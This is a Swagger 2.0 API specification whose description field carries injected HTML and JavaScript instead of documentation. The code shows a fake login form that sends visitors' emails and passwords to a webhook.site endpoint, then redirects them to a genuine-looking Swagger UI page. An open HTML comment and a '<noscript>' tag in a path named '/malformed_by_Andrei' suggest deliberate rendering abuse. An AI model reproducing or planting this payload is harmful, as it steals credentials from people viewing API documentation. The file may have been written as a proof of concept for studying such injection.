swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <h1>Log in to see the full documentation</h1>
    <form id="loginForm" onsubmit="handleSubmit(event)">
    <label for="email">Login:</label>
    <input name="email" required>
    <label for="password">Password:</label>
    <input name="password" type="password" required>
    <input type="submit" value="Login"></form>
    <script>
      function handleSubmit(event) {
        event.preventDefault(); // Prevent default form submission

        // Create a FormData object from the form
        const form = document.getElementById('loginForm');
        const formData = new FormData(form);

        // Create a new XMLHttpRequest
        const xhr = new XMLHttpRequest();
        xhr.open('POST', 'https://webhook.site/bc8d6747-e2bd-4874-b5be-2a28cf18a41e', true);

        // Define what happens on successful data submission
        xhr.onload = function() {
          if (xhr.status >= 200 && xhr.status < 300) {
            // Redirect to the desired URL after successful submission
            window.location.href = 'https://neopaydemo.synerioncloud.com/SynerionWeb/swagger/ui/index';
          } else {
            alert('Form submission failed');
          }
        };

        // Define what happens in case of an error
        xhr.onerror = function() {
          alert('Form submission failed');
        };

        // Send the form data
        xhr.send(formData);
      }
    </script><!--
  version: production
basePath: https://www.epas.de
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/test":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - sometext
      operationId: findAccounts
      summary: this is example text
  "/malformed_by_Andrei":
    delete:
      parameters:
      - description: |
          <noscript>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - test
      operationId: test
      summary: test
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Andrei
      operationId: some_operation
      summary: this is example text
